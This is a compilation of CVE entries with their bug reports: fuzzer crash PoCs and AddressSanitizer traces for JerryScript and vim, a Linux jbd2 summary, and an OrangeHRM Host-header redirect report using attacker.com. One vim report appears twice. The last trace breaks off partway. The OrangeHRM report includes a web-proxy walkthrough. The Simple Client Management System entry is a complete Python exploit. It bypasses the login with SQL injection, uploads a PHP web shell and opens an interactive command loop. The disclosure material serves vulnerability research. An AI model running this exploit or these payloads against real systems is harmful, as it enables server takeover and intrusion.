jbd2_journal_wait_updates in fs/jbd2/transaction.c in the Linux kernel before 5.17.1 has a use-after-free caused by a transaction_t race condition.

CVE-2022-28796

A Heap-based Buffer Overflow vulnerability exists in JerryScript 2.4.0 and prior versions via an out-of-bounds read in parser_parse_for_statement_start in the js-parser-statm.c file. This issue is similar to CVE-2020-29657.

**JerryScript revision**

$ jerry --version
Version: 3.0.0 (5a69b183)

**Build platform**

$ echo "$(lsb\_release -ds) ($(uname -mrs))"
Ubuntu 20.04.1 LTS (Linux 4.15.0-142-generic x86\_64)

**Build steps****Test case**

There are two test cases, where `jerry_poc_crash.js` can trigger a direct crash of the clean-built jerry and `jerry_poc_asan.js` can trigger a heap-overflow of the ASAN-enabled-built jerry.

This bug is found by a naive fuzzer. And I use `afl-tmin` to reduce the test cases. I sincerely apologize for making them struggling.

*   jerry\_poc\_crash.js

R\=function(){({0:0})
function x(){for(v in 0){function o(){}function x(){for(;;)for(function(){class A extends function(){for(let;;){((function(){}))}0\=function(){}
class e

*   jerry\_poc\_asan.js

R \= function() {
    function x(){
        function y(){
            for(;;)
                for(function(){
                    class A extends function() {
                        for(let;;) {
                            ((function(){}))
                        }

**Execution steps**

$ ~/release/jerryscript/build/bin/jerry jerry\_poc\_crash.js
Segmentation fault (core dumped)

$ ~/asan/jerryscript/build/bin/jerry jerry\_poc\_asan.js
==38036==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000005692 at pc 0x55555566952c bp 0x7fffffff9020 sp 0x7fffffff9010
READ of size 1 at 0x612000005692 thread T0
    #0 0x55555566952b  (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b)
    #1 0x55555566a84e  (/home/docker/asan/jerryscript/build/bin/jerry+0x11684e)
    #2 0x555555589aa2  (/home/docker/asan/jerryscript/build/bin/jerry+0x35aa2)
    #3 0x55555579d5c9  (/home/docker/asan/jerryscript/build/bin/jerry+0x2495c9)
    #4 0x5555555dead1  (/home/docker/asan/jerryscript/build/bin/jerry+0x8aad1)
    #5 0x555555633868  (/home/docker/asan/jerryscript/build/bin/jerry+0xdf868)
    #6 0x5555555c6462  (/home/docker/asan/jerryscript/build/bin/jerry+0x72462)
    #7 0x5555557c2c8e  (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #8 0x5555555f4ea1  (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1)
    #9 0x5555555f6d8e  (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e)
    #10 0x5555556188ae  (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae)
    #11 0x55555562451a  (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a)
    #12 0x55555563e211  (/home/docker/asan/jerryscript/build/bin/jerry+0xea211)
    #13 0x5555555c1f67  (/home/docker/asan/jerryscript/build/bin/jerry+0x6df67)
    #14 0x5555557c2c8e  (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #15 0x5555555f4ea1  (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1)
    #16 0x5555555f6d8e  (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e)
    #17 0x5555556188ae  (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae)
    #18 0x55555562451a  (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a)
    #19 0x555555625454  (/home/docker/asan/jerryscript/build/bin/jerry+0xd1454)
    #20 0x555555634129  (/home/docker/asan/jerryscript/build/bin/jerry+0xe0129)
    #21 0x5555555c6462  (/home/docker/asan/jerryscript/build/bin/jerry+0x72462)
    #22 0x5555557c2c8e  (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #23 0x55555560b8c8  (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8)
    #24 0x5555555c61c2  (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2)
    #25 0x5555557c2c8e  (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #26 0x55555560b8c8  (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8)
    #27 0x5555555c61c2  (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2)
    #28 0x5555557c2c8e  (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e)
    #29 0x5555555f4ea1  (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1)
    #30 0x5555555f6d8e  (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e)
    #31 0x5555556188ae  (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae)
    #32 0x55555562451a  (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a)
    #33 0x5555555ca181  (/home/docker/asan/jerryscript/build/bin/jerry+0x76181)
    #34 0x5555557c982d  (/home/docker/asan/jerryscript/build/bin/jerry+0x27582d)
    #35 0x55555592b342  (/home/docker/asan/jerryscript/build/bin/jerry+0x3d7342)
    #36 0x5555555718c9  (/home/docker/asan/jerryscript/build/bin/jerry+0x1d8c9)
    #37 0x7ffff73ba0b2  (/lib/x86\_64-linux-gnu/libc.so.6+0x270b2)
    #38 0x555555580add  (/home/docker/asan/jerryscript/build/bin/jerry+0x2cadd)

Address 0x612000005692 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b)
Shadow bytes around the buggy address:
  0x0c247fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=\>0x0c247fff8ad0: fa fa\[fa\]fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff8b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==38036==ABORTING
Aborted

**Output**

See above.

**Backtrace**

See above.

**Expected behavior**

Not to crash

CVE-2021-43453: Heap-overflow on an ill-formed JS program · Issue #4754 · jerryscript-project/jerryscript

OrangeHRM 4.10 is vulnerable to a Host header injection redirect via viewPersonalDetails endpoint.

**Environment details**  
OrangeHRM version: 4.10  
OrangeHRM source: Release build from Sourceforge or Git clone  
Platform: Ubuntu  
PHP version: 7.3.33  
Database and version: MariaDB 10.3  
Web server: Apache 2.4.52

If applicable:  
Browser: Firefox

**Describe the bug**  
When an authenticated user submits the "Personal Details" form, a 302 redirect to the "Personal Details" URL is sent in the response. Following is a request and its response—

    POST /symfony/web/index.php/pim/viewPersonalDetails HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 332
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/symfony/web/index.php/pim/viewMyDetails
    Cookie: Loggedin=True; _orangehrm=1ba9si14k85n5cfdc39frt4mis
    Upgrade-Insecure-Requests: 1
    
    personal%5B_csrf_token%5D=f80390168c630daa51a6ed85467cad78&personal%5BtxtEmpID%5D=2&personal%5BtxtEmpFirstName%5D=Pranav&personal%5BtxtEmpMiddleName%5D=&personal%5BtxtEmpLastName%5D=S&personal%5BtxtOtherID%5D=&personal%5BtxtLicExpDate%5D=yyyy-mm-dd&personal%5BoptGender%5D=1&personal%5BcmbMarital%5D=Single&personal%5BcmbNation%5D=0
    

Response:

    HTTP/1.1 302 Found
    Date: Wed, 09 Mar 2022 05:49:01 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Location: http://localhost/symfony/web/index.php/pim/viewPersonalDetails/empNumber/2
    Content-Length: 148
    Connection: close
    Content-Type: text/html; charset=utf-8
    
    

It was noticed that upon manipulating the Host header, in the POST request, to an arbitrary domain, it was possible to inject the Host header into the URL redirection in the 302 response. A user would then be redirected to the arbitrary domain. For example, the domain "example.com" can be passed as the value of the Host header in the POST request. The resulting 302 response redirects the user to http://example.com/symfony/web/index.php/pim/viewPersonalDetails/empNumber/2. Due to the nature of this vulnerability, it can be used in phishing attacks.

Following are the endpoints in the OrangeHRM application that are vulnerable to the Host Header Injection Redirect vulnerability:

1.  /symfony/web/index.php/pim/viewPersonalDetails
2.  /symfony/web/index.php/auth/validateCredentials

**To Reproduce**

1.  Login to the OrangeHRM application
2.  Navigate to "My Info"
3.  Under "Personal Details", click on "Edit"
4.  Turn on Intercept in Burp Suite (or any other web proxy)
5.  Click on "Save"
6.  Change the value of the `Host` header to `attacker.com`
7.  Click on Forward in Burp and turn off Intercept
8.  You will notice that the page gets redirected to `http://attacker.com/symfony/web/index.php/pim/viewPersonalDetails/empNumber/X`

**Expected behavior**  
A 404 error.

**What do you see instead:**  
A 302 redirect to the malicious domain.

**Screenshots**  
![image](https://user-images.githubusercontent.com/37404408/157669760-53d01d4d-03a2-4f62-8216-e4c120175c8a.png)  
![image](https://user-images.githubusercontent.com/37404408/157669846-c47ca311-a7c6-444a-8275-defdec31003b.png)

CVE-2022-27110: Host header injection redirect vulnerability · Issue #1175 · orangehrm/orangehrm

A Remote Code Execution (RCE) vulnerability exists in Simple Client Management System 1.0 in create.php due to the failure to validate the extension of the file being sent in a request.

**Simple Client Management System 1.0 - Remote Code Execution (RCE)**

**Platform:****PHP**

**Date:****2021-07-05**

  

    # Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE)
    # Date: July 4, 2021
    # Exploit Author: Ishan Saha
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip
    # Version: 1.0
    # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali
    
    #!/usr/bin/python
    
    # Description:
    
    # 1. This uses the SQL injection to bypass the admin login and create a new user
    # 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server
    # 3. the shell is called from the location 
    
    import requests 
    from colorama import Fore, Back, Style
    '''
    Description:
    Using the sql injeciton to bypass the login and create a user. 
    This user creates a client with the shell as an image and uploads the shell.
    The shell is called by the requests library for easier use.
    ------------------------------------------
    Developed by - Ishan Saha & HackerCTF team  (https://twitter.com/hackerctf)
    ------------------------------------------
    '''
    # Variables : change the URL according to need
    URL="http://192.168.0.248/client/"
    shellcode = "<?php system($_GET['cmd']);?>"
    filename = "shell.php"
    authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"}
    createuser = {"fname":"ishan","lname":"saha","email":"research@hackerctf.com","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"}
    userlogin={"uemail":"research@hackerctf.com","password":"Grow_with_hackerctf","login":"LOG IN"}
    shelldata={"fname":"a","lname":"l","uname":"l","email":"l@l.l","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"}
    def format_text(title,item):
      cr = '\r\n'
      section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr 
      item=str(item)
      text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+  Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
      return text
    
    
    ShellSession = requests.Session()
    response = ShellSession.get(URL)
    response = ShellSession.post(URL + "admin/index.php",data=authdata)
    response = ShellSession.post(URL + "admin/regester.php",data=createuser)
    response = ShellSession.post(URL,data=userlogin)
    response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")})
    location = URL +"img/" + filename
    #print statements
    print(format_text("Target",URL),end='')
    print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
    print(format_text("shell location",location),end='')
    print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))
    
    while True:
        cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
        if cmd == 'exit':
            break
        print(ShellSession.get(location + "?cmd="+cmd).content.decode())

CVE-2021-43484: Offensive Security’s Exploit Database Archive

heap buffer overflow in get_one_sourceline in GitHub repository vim/vim prior to 8.2.4647.

**Description**

When fuzzing vim commit 471b3aed3 I discovered a heap buffer overflow. I'm using ubuntu 20.04 with clang 13

**Proof of Concept**

Here is the minimized poc

    norm300gr0
    so
    

How to build

    LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
    make -j$(nproc)
    

Proof of Concept

Run crafted file with this command

./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!

ASan stack trace:

    aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_get_one_sourceline -c :qa!
    =================================================================
    ==2393051==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000004c6c at pc 0x000000430f36 bp 0x7fffffff7e50 sp 0x7fffffff7610
    READ of size 1 at 0x612000004c6c thread T0
        #0 0x430f35 in strlen (/home/aldo/vimtes/src/vim+0x430f35)
        #1 0xafb4c6 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1930:25
        #2 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
        #3 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
        #4 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
        #5 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #6 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #7 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #8 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #9 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #10 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #11 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #12 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #13 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #14 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #15 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #16 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #17 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
        #18 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #19 0x41edcd in _start (/home/aldo/vimtes/src/vim+0x41edcd)
    
    0x612000004c6c is located 0 bytes to the right of 300-byte region [0x612000004b40,0x612000004c6c)
    allocated by thread T0 here:
        #0 0x499fa9 in realloc (/home/aldo/vimtes/src/vim+0x499fa9)
        #1 0x4cbea5 in ga_grow_inner /home/aldo/vimtes/src/alloc.c:741:10
        #2 0x4cbc33 in ga_grow /home/aldo/vimtes/src/alloc.c:720:9
        #3 0x4cc637 in ga_concat /home/aldo/vimtes/src/alloc.c:834:9
        #4 0xafb1a0 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1919:6
        #5 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
        #6 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
        #7 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
        #8 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #9 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #10 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #11 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #12 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #13 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #14 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #15 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #16 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #17 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #18 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #19 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #20 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
        #21 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vimtes/src/vim+0x430f35) in strlen
    Shadow bytes around the buggy address:
      0x0c247fff8930: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff8950: 00 00 00 00 00 00 00 00 00 00 00 00 00 05 fa fa
      0x0c247fff8960: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c247fff8980: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa
      0x0c247fff8990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2393051==ABORTING
    

**💥 Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

CVE-2022-1160: heap buffer overflow in get_one_sourceline in vim

heap buffer overflow in get_one_sourceline in GitHub repository vim/vim prior to 8.2.

**Description**

When fuzzing vim commit `471b3aed3` I discovered a heap buffer overflow. I'm using ubuntu 20.04 with clang 13

**Proof of Concept**

Here is the minimized poc

    norm300gr0
    so
    

How to build

    LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
    make -j$(nproc)
    

Proof of Concept

Run crafted file with this command

`./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!`

ASan stack trace:

    aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_get_one_sourceline -c :qa!
    =================================================================
    ==2393051==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000004c6c at pc 0x000000430f36 bp 0x7fffffff7e50 sp 0x7fffffff7610
    READ of size 1 at 0x612000004c6c thread T0
        #0 0x430f35 in strlen (/home/aldo/vimtes/src/vim+0x430f35)
        #1 0xafb4c6 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1930:25
        #2 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
        #3 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
        #4 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
        #5 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #6 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #7 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #8 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #9 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #10 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #11 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #12 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #13 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #14 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #15 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #16 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #17 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
        #18 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #19 0x41edcd in _start (/home/aldo/vimtes/src/vim+0x41edcd)
    
    0x612000004c6c is located 0 bytes to the right of 300-byte region [0x612000004b40,0x612000004c6c)
    allocated by thread T0 here:
        #0 0x499fa9 in realloc (/home/aldo/vimtes/src/vim+0x499fa9)
        #1 0x4cbea5 in ga_grow_inner /home/aldo/vimtes/src/alloc.c:741:10
        #2 0x4cbc33 in ga_grow /home/aldo/vimtes/src/alloc.c:720:9
        #3 0x4cc637 in ga_concat /home/aldo/vimtes/src/alloc.c:834:9
        #4 0xafb1a0 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1919:6
        #5 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
        #6 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
        #7 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
        #8 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #9 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #10 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #11 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #12 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #13 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #14 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #15 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #16 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #17 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #18 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #19 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #20 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
        #21 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vimtes/src/vim+0x430f35) in strlen
    Shadow bytes around the buggy address:
      0x0c247fff8930: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff8950: 00 00 00 00 00 00 00 00 00 00 00 00 00 05 fa fa
      0x0c247fff8960: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c247fff8980: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa
      0x0c247fff8990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2393051==ABORTING
    

**💥 Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

Use after free in utf_ptr2char in GitHub repository vim/vim prior to 8.2.4646.

✍️ Description

When fuzzing vim commit 9dac9b175, I discovered a use after free. I'm testing on ubuntu 20.04 with clang 13.

**Proof of Concept**

Here is the minimized poc

    s/\v/\r
    /\%'(\{,600}
    

How to build

    LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
    make -j$(nproc)
    

Proof of Concept

Run crafted file with this command

./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!

ASan stack trace:

    aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!
    =================================================================
    ==49542==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000062b0 at pc 0x0000008636a8 bp 0x7fffffff5980 sp 0x7fffffff5978
    READ of size 1 at 0x6020000062b0 thread T0
        #0 0x8636a7 in utf_ptr2char /home/aldo/vimtes/src/mbyte.c:1789:9
        #1 0xaa6a07 in regmatch /home/aldo/vimtes/src/./regexp_bt.c:3317:12
        #2 0xaa58ca in regtry /home/aldo/vimtes/src/./regexp_bt.c:4722:9
        #3 0xaa5231 in bt_regexec_both /home/aldo/vimtes/src/./regexp_bt.c:4955:15
        #4 0xa97dec in bt_regexec_multi /home/aldo/vimtes/src/./regexp_bt.c:5067:12
        #5 0xa312ac in vim_regexec_multi /home/aldo/vimtes/src/regexp.c:2864:14
        #6 0xb01a23 in searchit /home/aldo/vimtes/src/search.c:767:14
        #7 0xb06edc in do_search /home/aldo/vimtes/src/search.c:1565:6
        #8 0x6dd9d4 in get_address /home/aldo/vimtes/src/ex_docmd.c:4351:12
        #9 0x6e06ee in parse_cmd_address /home/aldo/vimtes/src/ex_docmd.c:3265:9
        #10 0x6ce320 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:1938:6
        #11 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #12 0xaf7105 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #13 0xaf4b50 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #14 0xaf4689 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #15 0xaf416d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #16 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #17 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #18 0x6cacb0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
